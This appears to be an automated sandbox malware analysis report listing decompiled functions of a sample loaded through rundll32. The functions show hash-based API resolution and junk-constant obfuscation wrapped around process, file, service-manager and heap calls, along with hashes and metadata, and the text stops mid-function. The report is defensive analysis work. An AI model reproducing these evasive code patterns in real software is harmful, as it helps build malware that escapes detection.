                                                                                                        • Associated: 00000004.00000002.310659344.00000000006C0000.00000004.00000001.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.310790430.00000000006E6000.00000004.00000001.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_6c0000_rundll32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: DeleteFile
                                                                                                        • String ID: 3l}!$7XJ
                                                                                                        • API String ID: 4033686569-2205417827
                                                                                                        • Opcode ID: 10709235247fc134180b3dbd0d2fc7697fcbb658dcad94b6e8f128d82acf9f3f
                                                                                                        • Instruction ID: 10e8d7cfe491ebf81d2dfb8e6ee572f1761bc1f717f584e0e9ceda8d041ad84a
                                                                                                        • Opcode Fuzzy Hash: 10709235247fc134180b3dbd0d2fc7697fcbb658dcad94b6e8f128d82acf9f3f
                                                                                                        • Instruction Fuzzy Hash: C12145B5D01318AFDF18DFA4C98A9EEFBB0FF14304F108188E966A6210D7B85B558F91
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 51%
                                                                                                        			E006E2C24(WCHAR* __ecx, void* __edx, intOrPtr _a12, intOrPtr _a20, int _a24, intOrPtr _a28, struct _STARTUPINFOW* _a32, intOrPtr _a40, intOrPtr _a44, WCHAR* _a52, struct _PROCESS_INFORMATION* _a56) {
                                                                                                        				signed int _v8;
                                                                                                        				signed int _v12;
                                                                                                        				signed int _v16;
                                                                                                        				signed int _v20;
                                                                                                        				struct _SECURITY_ATTRIBUTES* _v24;
                                                                                                        				struct _SECURITY_ATTRIBUTES* _v28;
                                                                                                        				intOrPtr _v32;
                                                                                                        				void* _t49;
                                                                                                        				int _t56;
                                                                                                        				WCHAR* _t60;
                                                                                                        
                                                                                                        				_push(_a56);
                                                                                                        				_t60 = __ecx;
                                                                                                        				_push(_a52);
                                                                                                        				_push(0);
                                                                                                        				_push(_a44);
                                                                                                        				_push(_a40);
                                                                                                        				_push(0);
                                                                                                        				_push(_a32);
                                                                                                        				_push(_a28);
                                                                                                        				_push(_a24);
                                                                                                        				_push(_a20);
                                                                                                        				_push(0);
                                                                                                        				_push(_a12);
                                                                                                        				_push(0);
                                                                                                        				_push(0);
                                                                                                        				_push(__ecx);
                                                                                                        				E006DFE29(_t49);
                                                                                                        				_v32 = 0x534833;
                                                                                                        				_v28 = 0;
                                                                                                        				_v24 = 0;
                                                                                                        				_v8 = 0x70adbe;
                                                                                                        				_v8 = _v8 >> 5;
                                                                                                        				_v8 = _v8 << 0xa;
                                                                                                        				_v8 = _v8 | 0x1d11c356;
                                                                                                        				_v8 = _v8 ^ 0x1f145645;
                                                                                                        				_v20 = 0xecea8a;
                                                                                                        				_v20 = _v20 | 0x5baa72b8;
                                                                                                        				_v20 = _v20 ^ 0x5be1d11d;
                                                                                                        				_v16 = 0x76217f;
                                                                                                        				_v16 = _v16 >> 0x10;
                                                                                                        				_v16 = _v16 | 0xe98780dc;
                                                                                                        				_v16 = _v16 ^ 0xe98c1e91;
                                                                                                        				_v12 = 0xeb975;
                                                                                                        				_v12 = _v12 ^ 0xd8138edb;
                                                                                                        				_v12 = _v12 | 0x0b4171d5;
                                                                                                        				_v12 = _v12 ^ 0xdb5d9300;
                                                                                                        				E006CEB52(__ecx, __ecx, 0xb7160725, 0x75, 0xa2289af1);
                                                                                                        				_t56 = CreateProcessW(_a52, _t60, 0, 0, _a24, 0, 0, 0, _a32, _a56); // executed
                                                                                                        				return _t56;
                                                                                                        			}













                                                                                                        0x006e2c2c
                                                                                                        0x006e2c31
                                                                                                        0x006e2c33
                                                                                                        0x006e2c36
                                                                                                        0x006e2c37
                                                                                                        0x006e2c3a
                                                                                                        0x006e2c3d
                                                                                                        0x006e2c3e
                                                                                                        0x006e2c41
                                                                                                        0x006e2c44
                                                                                                        0x006e2c47
                                                                                                        0x006e2c4a
                                                                                                        0x006e2c4b
                                                                                                        0x006e2c4e
                                                                                                        0x006e2c4f
                                                                                                        0x006e2c51
                                                                                                        0x006e2c52
                                                                                                        0x006e2c57
                                                                                                        0x006e2c61
                                                                                                        0x006e2c64
                                                                                                        0x006e2c67
                                                                                                        0x006e2c6e
                                                                                                        0x006e2c72
                                                                                                        0x006e2c76
                                                                                                        0x006e2c7d
                                                                                                        0x006e2c84
                                                                                                        0x006e2c8b
                                                                                                        0x006e2c92
                                                                                                        0x006e2c99
                                                                                                        0x006e2ca0
                                                                                                        0x006e2ca4
                                                                                                        0x006e2cab
                                                                                                        0x006e2cb2
                                                                                                        0x006e2cb9
                                                                                                        0x006e2cc0
                                                                                                        0x006e2cc7
                                                                                                        0x006e2ce8
                                                                                                        0x006e2d02
                                                                                                        0x006e2d09

                                                                                                        APIs
                                                                                                        • CreateProcessW.KERNEL32(?,2E751909,00000000,00000000,00534833,00000000,00000000,00000000,?,?), ref: 006E2D02
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.310675126.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.310659344.00000000006C0000.00000004.00000001.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.310790430.00000000006E6000.00000004.00000001.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_6c0000_rundll32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CreateProcess
                                                                                                        • String ID: 3HS
                                                                                                        • API String ID: 963392458-330188696
                                                                                                        • Opcode ID: b0049691a906c617faab48a03f019d00495406e067b30e8a3afe4c22a13f3ee0
                                                                                                        • Instruction ID: b1d5a18f5813d1b8b2df4e4d38d7277fa417973b805aa5d9a647d3252041f7ec
                                                                                                        • Opcode Fuzzy Hash: b0049691a906c617faab48a03f019d00495406e067b30e8a3afe4c22a13f3ee0
                                                                                                        • Instruction Fuzzy Hash: AD21F372800248BBCF559F96DC0ACDFBFB9EF85704F108199F915A2220C3B58A24DFA0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 56%
                                                                                                        			E006E45CA(WCHAR* __ecx, void* __edx, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, long _a24, intOrPtr _a28, intOrPtr _a32, long _a36, intOrPtr _a40, long _a44, long _a48) {
                                                                                                        				signed int _v8;
                                                                                                        				signed int _v12;
                                                                                                        				signed int _v16;
                                                                                                        				signed int _v20;
                                                                                                        				struct _SECURITY_ATTRIBUTES* _v24;
                                                                                                        				intOrPtr _v28;
                                                                                                        				void* _t51;
                                                                                                        				void* _t60;
                                                                                                        				WCHAR* _t64;
                                                                                                        
                                                                                                        				_push(_a48);
                                                                                                        				_t64 = __ecx;
                                                                                                        				_push(_a44);
                                                                                                        				_push(_a40);
                                                                                                        				_push(_a36);
                                                                                                        				_push(_a32);
                                                                                                        				_push(_a28);
                                                                                                        				_push(_a24);
                                                                                                        				_push(_a20);
                                                                                                        				_push(_a16);
                                                                                                        				_push(_a12);
                                                                                                        				_push(0);
                                                                                                        				_push(0);
                                                                                                        				_push(__ecx);
                                                                                                        				E006DFE29(_t51);
                                                                                                        				_v28 = 0x204d4f;
                                                                                                        				_v24 = 0;
                                                                                                        				_v20 = 0xd27984;
                                                                                                        				_v20 = _v20 | 0x43788b11;
                                                                                                        				_v20 = _v20 ^ 0x43f3df42;
                                                                                                        				_v16 = 0xf976f1;
                                                                                                        				_v16 = _v16 + 0xffff3d74;
                                                                                                        				_v16 = _v16 | 0xfc5c4419;
                                                                                                        				_v16 = _v16 ^ 0xfcfdb6fc;
                                                                                                        				_v12 = 0xb7df7c;
                                                                                                        				_v12 = _v12 + 0xffff3658;
                                                                                                        				_v12 = _v12 * 0x13;
                                                                                                        				_v12 = _v12 ^ 0x1f30f970;
                                                                                                        				_v12 = _v12 ^ 0x12ab006a;
                                                                                                        				_v8 = 0x8ba8ca;
                                                                                                        				_v8 = _v8 | 0x62aa166a;
                                                                                                        				_v8 = _v8 + 0xa2f6;
                                                                                                        				_v8 = _v8 * 0x55;
                                                                                                        				_v8 = _v8 ^ 0xc33acf6c;
                                                                                                        				E006CEB52(__ecx, __ecx, 0xbc17bbde, 0x19f, 0xa2289af1);
                                                                                                        				_t60 = CreateFileW(_t64, _a24, _a48, 0, _a44, _a36, 0); // executed
                                                                                                        				return _t60;
                                                                                                        			}












                                                                                                        0x006e45d2
                                                                                                        0x006e45d7
                                                                                                        0x006e45d9
                                                                                                        0x006e45dc
                                                                                                        0x006e45df
                                                                                                        0x006e45e2
                                                                                                        0x006e45e5
                                                                                                        0x006e45e8
                                                                                                        0x006e45eb
                                                                                                        0x006e45ee
                                                                                                        0x006e45f1
                                                                                                        0x006e45f4
                                                                                                        0x006e45f5
                                                                                                        0x006e45f7
                                                                                                        0x006e45f8
                                                                                                        0x006e45fd
                                                                                                        0x006e4607
                                                                                                        0x006e460a
                                                                                                        0x006e4611
                                                                                                        0x006e4618
                                                                                                        0x006e461f
                                                                                                        0x006e4626
                                                                                                        0x006e462d
                                                                                                        0x006e4634
                                                                                                        0x006e463b
                                                                                                        0x006e4642
                                                                                                        0x006e465d
                                                                                                        0x006e4660
                                                                                                        0x006e4667
                                                                                                        0x006e466e
                                                                                                        0x006e4675
                                                                                                        0x006e467c
                                                                                                        0x006e4688
                                                                                                        0x006e468b
                                                                                                        0x006e469e
                                                                                                        0x006e46b5
                                                                                                        0x006e46bc

                                                                                                        APIs
                                                                                                        • CreateFileW.KERNEL32(?,00000057,?,00000000,?,?,00000000), ref: 006E46B5
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.310675126.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.310659344.00000000006C0000.00000004.00000001.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.310790430.00000000006E6000.00000004.00000001.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_6c0000_rundll32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CreateFile
                                                                                                        • String ID: OM
                                                                                                        • API String ID: 823142352-4198367855
                                                                                                        • Opcode ID: c9e2e688d9aa6a43dcdad6de9a4dd150b1ce22289e56966cf6fc1244f0671eef
                                                                                                        • Instruction ID: 8fab18b7e1ee6d8954e173310d076195c2758fc7d74de119d38806c3018d65a2
                                                                                                        • Opcode Fuzzy Hash: c9e2e688d9aa6a43dcdad6de9a4dd150b1ce22289e56966cf6fc1244f0671eef
                                                                                                        • Instruction Fuzzy Hash: F321E072801249BBCF05DFA9CD46CDEBFB5EF88304F508199F915A6220D3768A61AF90
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 58%
                                                                                                        			E006E44FF(void* __ecx, void* __edx, intOrPtr _a8, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
                                                                                                        				unsigned int _v8;
                                                                                                        				signed int _v12;
                                                                                                        				signed int _v16;
                                                                                                        				signed int _v20;
                                                                                                        				void* _t47;
                                                                                                        				intOrPtr* _t57;
                                                                                                        				void* _t58;
                                                                                                        				signed int _t60;
                                                                                                        				signed int _t61;
                                                                                                        
                                                                                                        				E006DFE29(_t47);
                                                                                                        				_v20 = 0xa68a31;
                                                                                                        				_t60 = 0x6d;
                                                                                                        				_v20 = _v20 / _t60;
                                                                                                        				_v20 = _v20 ^ 0x00000260;
                                                                                                        				_v16 = 0xfa9629;
                                                                                                        				_v16 = _v16 + 0x734b;
                                                                                                        				_v16 = _v16 ^ 0x638d356d;
                                                                                                        				_v16 = _v16 ^ 0x637ea9c8;
                                                                                                        				_v8 = 0x3f26ab;
                                                                                                        				_v8 = _v8 ^ 0xcdd207a4;
                                                                                                        				_v8 = _v8 ^ 0xb6eb62c4;
                                                                                                        				_v8 = _v8 >> 0xd;
                                                                                                        				_v8 = _v8 ^ 0x0005a548;
                                                                                                        				_v12 = 0xe291fe;
                                                                                                        				_t61 = 0x24;
                                                                                                        				_v12 = _v12 / _t61;
                                                                                                        				_v12 = _v12 + 0x3d74;
                                                                                                        				_v12 = _v12 ^ 0x00095158;
                                                                                                        				_t57 = E006CEB52(_t61, _t61, 0x418e972c, 0x54, 0xa2289af1);
                                                                                                        				_t58 =  *_t57(_a24, 0, _a20, 0x28, __ecx, __edx, 0, _a8, 0x28, _a16, _a20, _a24); // executed
                                                                                                        				return _t58;
                                                                                                        			}












                                                                                                        0x006e4517
                                                                                                        0x006e451c
                                                                                                        0x006e452d
                                                                                                        0x006e4532
                                                                                                        0x006e4537
                                                                                                        0x006e453e
                                                                                                        0x006e4545
                                                                                                        0x006e454c
                                                                                                        0x006e4553
                                                                                                        0x006e455a
                                                                                                        0x006e4561
                                                                                                        0x006e4568
                                                                                                        0x006e456f
                                                                                                        0x006e4573
                                                                                                        0x006e457a
                                                                                                        0x006e4584
                                                                                                        0x006e458c
                                                                                                        0x006e458f
                                                                                                        0x006e4596
                                                                                                        0x006e45b2
                                                                                                        0x006e45c4
                                                                                                        0x006e45c9

                                                                                                        APIs
                                                                                                        • SetFileInformationByHandle.KERNEL32(?,00000000,?,00000028), ref: 006E45C4
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.310675126.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.310659344.00000000006C0000.00000004.00000001.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.310790430.00000000006E6000.00000004.00000001.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_6c0000_rundll32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: FileHandleInformation
                                                                                                        • String ID: XQ
                                                                                                        • API String ID: 3935143524-1200779947
                                                                                                        • Opcode ID: 81dfb277e86e3c1fe3069d107eacbb6aa7e5857e87f0bf20d0672193a35411da
                                                                                                        • Instruction ID: 5ede7101353783e211e177aee6bb19a35f207ca6f25b63c659378633c9508656
                                                                                                        • Opcode Fuzzy Hash: 81dfb277e86e3c1fe3069d107eacbb6aa7e5857e87f0bf20d0672193a35411da
                                                                                                        • Instruction Fuzzy Hash: 50213871E40209FBEF54CFA5DD4AAAEBBB1EB54704F108189B910A6290D3B59A649F40
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 65%
                                                                                                        			E006CEE62(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, int _a16, short* _a20) {
                                                                                                        				signed int _v8;
                                                                                                        				signed int _v12;
                                                                                                        				signed int _v16;
                                                                                                        				signed int _v20;
                                                                                                        				void* _t34;
                                                                                                        				void* _t41;
                                                                                                        				void* _t44;
                                                                                                        
                                                                                                        				_push(_a20);
                                                                                                        				_t44 = __edx;
                                                                                                        				_push(_a16);
                                                                                                        				_push(_a12);
                                                                                                        				_push(_a8);
                                                                                                        				_push(_a4);
                                                                                                        				_push(__edx);
                                                                                                        				_push(__ecx);
                                                                                                        				E006DFE29(_t34);
                                                                                                        				_v20 = 0xea751a;
                                                                                                        				_v20 = _v20 | 0xe9b69993;
                                                                                                        				_v20 = _v20 ^ 0xe9f29d6b;
                                                                                                        				_v16 = 0x605393;
                                                                                                        				_v16 = _v16 | 0xcc974431;
                                                                                                        				_v16 = _v16 ^ 0xccf8b40a;
                                                                                                        				_v12 = 0x102a1a;
                                                                                                        				_v12 = _v12 + 0xcb09;
                                                                                                        				_v12 = _v12 ^ 0x001131dd;
                                                                                                        				_v8 = 0x570378;
                                                                                                        				_v8 = _v8 >> 5;
                                                                                                        				_v8 = _v8 ^ 0xef617e60;
                                                                                                        				_v8 = _v8 ^ 0xef696bf9;
                                                                                                        				E006CEB52(__ecx, __ecx, 0x5c98ffad, 5, 0x1f76e49f);
                                                                                                        				_t41 = OpenServiceW(_t44, _a20, _a16); // executed
                                                                                                        				return _t41;
                                                                                                        			}










                                                                                                        0x006cee69
                                                                                                        0x006cee6c
                                                                                                        0x006cee6e
                                                                                                        0x006cee71
                                                                                                        0x006cee74
                                                                                                        0x006cee77
                                                                                                        0x006cee7a
                                                                                                        0x006cee7b
                                                                                                        0x006cee7c
                                                                                                        0x006cee81
                                                                                                        0x006cee8b
                                                                                                        0x006cee92
                                                                                                        0x006cee99
                                                                                                        0x006ceea0
                                                                                                        0x006ceea7
                                                                                                        0x006ceeae
                                                                                                        0x006ceeb5
                                                                                                        0x006ceebc
                                                                                                        0x006ceec3
                                                                                                        0x006ceeca
                                                                                                        0x006ceece
                                                                                                        0x006ceed5
                                                                                                        0x006ceef6
                                                                                                        0x006cef05
                                                                                                        0x006cef0b

                                                                                                        APIs
                                                                                                        • OpenServiceW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 006CEF05
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.310675126.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.310659344.00000000006C0000.00000004.00000001.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.310790430.00000000006E6000.00000004.00000001.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_6c0000_rundll32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: OpenService
                                                                                                        • String ID: `~a
                                                                                                        • API String ID: 3098006287-142445290
                                                                                                        • Opcode ID: 6383736253cef5703bc9a023e52ac128717e5205db758edbe98fcd92a09a10c3
                                                                                                        • Instruction ID: a7b49f9ed65a20bf0af8c8c4d271b113919470b0216e76e5505cdcf2f7e3a7b3
                                                                                                        • Opcode Fuzzy Hash: 6383736253cef5703bc9a023e52ac128717e5205db758edbe98fcd92a09a10c3
                                                                                                        • Instruction Fuzzy Hash: D611F275C01219FBCF48EFA5DD0A8DEBFB5EB04314F108588F92562261D3B68A20AF91
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 76%
                                                                                                        			E006D648A(long __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, void* _a12, long _a16) {
                                                                                                        				signed int _v8;
                                                                                                        				unsigned int _v12;
                                                                                                        				signed int _v16;
                                                                                                        				signed int _v20;
                                                                                                        				void* _t41;
                                                                                                        				void* _t49;
                                                                                                        				long _t52;
                                                                                                        
                                                                                                        				_push(_a16);
                                                                                                        				_t52 = __ecx;
                                                                                                        				_push(_a12);
                                                                                                        				_push(_a8);
                                                                                                        				_push(_a4);
                                                                                                        				_push(__ecx);
                                                                                                        				E006DFE29(_t41);
                                                                                                        				_v12 = 0x3cd3f;
                                                                                                        				_v12 = _v12 << 3;
                                                                                                        				_v12 = _v12 | 0xc677f757;
                                                                                                        				_v12 = _v12 >> 7;
                                                                                                        				_v12 = _v12 ^ 0x0188bcff;
                                                                                                        				_v20 = 0x40fc9e;
                                                                                                        				_v20 = _v20 << 4;
                                                                                                        				_v20 = _v20 ^ 0x040306b1;
                                                                                                        				_v16 = 0x159e9f;
                                                                                                        				_v16 = _v16 + 0xffffd0d5;
                                                                                                        				_v16 = _v16 * 0x33;
                                                                                                        				_v16 = _v16 ^ 0x04433238;
                                                                                                        				_v8 = 0x8a430d;
                                                                                                        				_v8 = _v8 + 0xffffdfbc;
                                                                                                        				_v8 = _v8 | 0x5356d001;
                                                                                                        				_v8 = _v8 + 0x638e;
                                                                                                        				_v8 = _v8 ^ 0x53d0144a;
                                                                                                        				E006CEB52(__ecx, __ecx, 0x958aafc8, 0x1c3, 0xa2289af1);
                                                                                                        				_t49 = RtlAllocateHeap(_a12, _a16, _t52); // executed
                                                                                                        				return _t49;
                                                                                                        			}










                                                                                                        0x006d6491
                                                                                                        0x006d6494
                                                                                                        0x006d6496
                                                                                                        0x006d6499
                                                                                                        0x006d649c
                                                                                                        0x006d64a0
                                                                                                        0x006d64a1
                                                                                                        0x006d64a6
                                                                                                        0x006d64b0
                                                                                                        0x006d64b4
                                                                                                        0x006d64bb
                                                                                                        0x006d64bf
                                                                                                        0x006d64c6
                                                                                                        0x006d64cd
                                                                                                        0x006d64d1
                                                                                                        0x006d64d8
                                                                                                        0x006d64df
                                                                                                        0x006d64fa
                                                                                                        0x006d64fd
                                                                                                        0x006d6504
                                                                                                        0x006d650b
                                                                                                        0x006d6512
                                                                                                        0x006d6519
                                                                                                        0x006d6520
                                                                                                        0x006d6534
                                                                                                        0x006d6543
                                                                                                        0x006d6549

                                                                                                        APIs
                                                                                                        • RtlAllocateHeap.NTDLL(040306B1,?,ED94606E,?,?,?,?,?,?,?,?,?,?,?), ref: 006D6543
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.310675126.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.310659344.00000000006C0000.00000004.00000001.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.310790430.00000000006E6000.00000004.00000001.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_6c0000_rundll32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: AllocateHeap
                                                                                                        • String ID:
                                                                                                        • API String ID: 1279760036-0
                                                                                                        • Opcode ID: f41072fe55694ed81fb5a2d434f63a6d1651ccbd0ba08c91d6bc4f92d8fba8a5
                                                                                                        • Instruction ID: d7edcaef0f06cf8433bcc8eff0479fb21292bfed237c1a989880942fecbb62c6
                                                                                                        • Opcode Fuzzy Hash: f41072fe55694ed81fb5a2d434f63a6d1651ccbd0ba08c91d6bc4f92d8fba8a5
                                                                                                        • Instruction Fuzzy Hash: EA1103B2C0121DFBDF05DFA5D9098DEBBB4FB00314F108598E811A6250E3B59B149F91
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 70%
                                                                                                        			E006DE8B6(void* __ecx, void* __edx, intOrPtr _a4, int _a12, intOrPtr _a16) {
                                                                                                        				signed int _v8;
                                                                                                        				signed int _v12;
                                                                                                        				unsigned int _v16;
                                                                                                        				signed int _v20;
                                                                                                        				void* _t29;
                                                                                                        				void* _t37;
                                                                                                        
                                                                                                        				_push(_a16);
                                                                                                        				_push(_a12);
                                                                                                        				_push(0);
                                                                                                        				_push(_a4);
                                                                                                        				_push(0);
                                                                                                        				E006DFE29(_t29);
                                                                                                        				_v20 = 0xc8e76b;
                                                                                                        				_v20 = _v20 | 0x270203a1;
                                                                                                        				_v20 = _v20 ^ 0x27c97096;
                                                                                                        				_v16 = 0x55aebc;
                                                                                                        				_v16 = _v16 >> 2;
                                                                                                        				_v16 = _v16 ^ 0x00171a80;
                                                                                                        				_v12 = 0xfad6fe;
                                                                                                        				_v12 = _v12 ^ 0xd14a4d1d;
                                                                                                        				_v12 = _v12 ^ 0xd1b10da7;
                                                                                                        				_v8 = 0x428060;
                                                                                                        				_v8 = _v8 * 0x54;
                                                                                                        				_v8 = _v8 ^ 0x15de1a76;
                                                                                                        				E006CEB52(__ecx, __ecx, 0x3c0b385, 0x1bc, 0x1f76e49f);
                                                                                                        				_t37 = OpenSCManagerW(0, 0, _a12); // executed
                                                                                                        				return _t37;
                                                                                                        			}









                                                                                                        0x006de8bd
                                                                                                        0x006de8c2
                                                                                                        0x006de8c5
                                                                                                        0x006de8c6
                                                                                                        0x006de8ca
                                                                                                        0x006de8cb
                                                                                                        0x006de8d0
                                                                                                        0x006de8da
                                                                                                        0x006de8e1
                                                                                                        0x006de8e8
                                                                                                        0x006de8ef
                                                                                                        0x006de8f3
                                                                                                        0x006de8fa
                                                                                                        0x006de901
                                                                                                        0x006de908
                                                                                                        0x006de90f
                                                                                                        0x006de92a
                                                                                                        0x006de92d
                                                                                                        0x006de941
                                                                                                        0x006de94e
                                                                                                        0x006de954

                                                                                                        APIs
                                                                                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,27C97096,?,?,?,?,?,?,?,?,?,?,?), ref: 006DE94E
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.310675126.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.310659344.00000000006C0000.00000004.00000001.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.310790430.00000000006E6000.00000004.00000001.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_6c0000_rundll32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ManagerOpen
                                                                                                        • String ID:
                                                                                                        • API String ID: 1889721586-0
                                                                                                        • Opcode ID: 938ae55f57f10c9ec9f30609793a9938b44550d2e06b30d2dbdd077d207e708c
                                                                                                        • Instruction ID: 0954bd3e70bb04d4f6d37ab0b9a69cb5f249145ebe79c7815e8fa7ee315f08d7
                                                                                                        • Opcode Fuzzy Hash: 938ae55f57f10c9ec9f30609793a9938b44550d2e06b30d2dbdd077d207e708c
                                                                                                        • Instruction Fuzzy Hash: 3C11157190221DFB9B04EFA899468EEBFB4EB04308F108598E825A2211D3B18B149B95
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 100%
                                                                                                        			E006DD11A() {
                                                                                                        				unsigned int _v8;
                                                                                                        				signed int _v12;
                                                                                                        				signed int _v16;
                                                                                                        				signed int _v20;
                                                                                                        				signed int _v24;
                                                                                                        				intOrPtr _v28;
                                                                                                        				intOrPtr _v32;
                                                                                                        				intOrPtr _v36;
                                                                                                        				void* _t39;
                                                                                                        
                                                                                                        				_v24 = _v24 & 0x00000000;
                                                                                                        				_v36 = 0x78f5c7;
                                                                                                        				_v32 = 0xa12bb9;
                                                                                                        				_v28 = 0x4eca09;
                                                                                                        				_v8 = 0x8b256f;
                                                                                                        				_v8 = _v8 << 0xb;
                                                                                                        				_v8 = _v8 ^ 0x4a7d0011;
                                                                                                        				_v8 = _v8 >> 9;
                                                                                                        				_v8 = _v8 ^ 0x00073d60;
                                                                                                        				_v20 = 0x1e549a;
                                                                                                        				_v20 = _v20 + 0xffffad33;
                                                                                                        				_v20 = _v20 ^ 0x00134b4f;
                                                                                                        				_v16 = 0x8dd9dd;
                                                                                                        				_v16 = _v16 << 3;
                                                                                                        				_v16 = _v16 ^ 0x0460bc3c;
                                                                                                        				_v12 = 0x358059;
                                                                                                        				_v12 = _v12 + 0xb97b;
                                                                                                        				_v12 = _v12 ^ 0x003502df;
                                                                                                        				E006CEB52(_t39, _t39, 0x83891850, 0x1c, 0xa2289af1);
                                                                                                        				ExitProcess(0);
                                                                                                        			}












                                                                                                        0x006dd120
                                                                                                        0x006dd124
                                                                                                        0x006dd12b
                                                                                                        0x006dd132
                                                                                                        0x006dd139
                                                                                                        0x006dd140
                                                                                                        0x006dd144
                                                                                                        0x006dd14b
                                                                                                        0x006dd14f
                                                                                                        0x006dd156
                                                                                                        0x006dd15d
                                                                                                        0x006dd164
                                                                                                        0x006dd16b
                                                                                                        0x006dd172
                                                                                                        0x006dd176
                                                                                                        0x006dd17d
                                                                                                        0x006dd184
                                                                                                        0x006dd18b
                                                                                                        0x006dd1ac
                                                                                                        0x006dd1b6

                                                                                                        APIs
                                                                                                        • ExitProcess.KERNEL32(00000000), ref: 006DD1B6
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.310675126.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.310659344.00000000006C0000.00000004.00000001.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.310790430.00000000006E6000.00000004.00000001.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_6c0000_rundll32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ExitProcess
                                                                                                        • String ID:
                                                                                                        • API String ID: 621844428-0
                                                                                                        • Opcode ID: 67c658d72cc930f45ab36e019061580956781c758de54a32820380ba4476f13f
                                                                                                        • Instruction ID: afd5f95e457241e0b98a342b403ce0cd30c64ae9d1de93b7b5e2abc40f9895ae
                                                                                                        • Opcode Fuzzy Hash: 67c658d72cc930f45ab36e019061580956781c758de54a32820380ba4476f13f
                                                                                                        • Instruction Fuzzy Hash: 781112B1C4030CEBDB44DFE5DA4AAEEFBB0EB00708F108588D521B6240D3B89B489F90
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 79%
                                                                                                        			E006E061D(signed int __ecx, WCHAR* __edx, WCHAR* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                        				signed int _v8;
                                                                                                        				signed int _v12;
                                                                                                        				signed int _v16;
                                                                                                        				signed int _v20;
                                                                                                        				signed int _v24;
                                                                                                        				intOrPtr _v28;
                                                                                                        				void* _t44;
                                                                                                        				int _t53;
                                                                                                        				WCHAR* _t56;
                                                                                                        
                                                                                                        				_push(_a12);
                                                                                                        				_t56 = __edx;
                                                                                                        				_push(_a8);
                                                                                                        				_push(_a4);
                                                                                                        				_push(__edx);
                                                                                                        				_push(__ecx);
                                                                                                        				E006DFE29(_t44);
                                                                                                        				_v24 = _v24 & 0x00000000;
                                                                                                        				_v28 = 0xcd60b7;
                                                                                                        				_v12 = 0x7257ab;
                                                                                                        				_v12 = _v12 << 0xd;
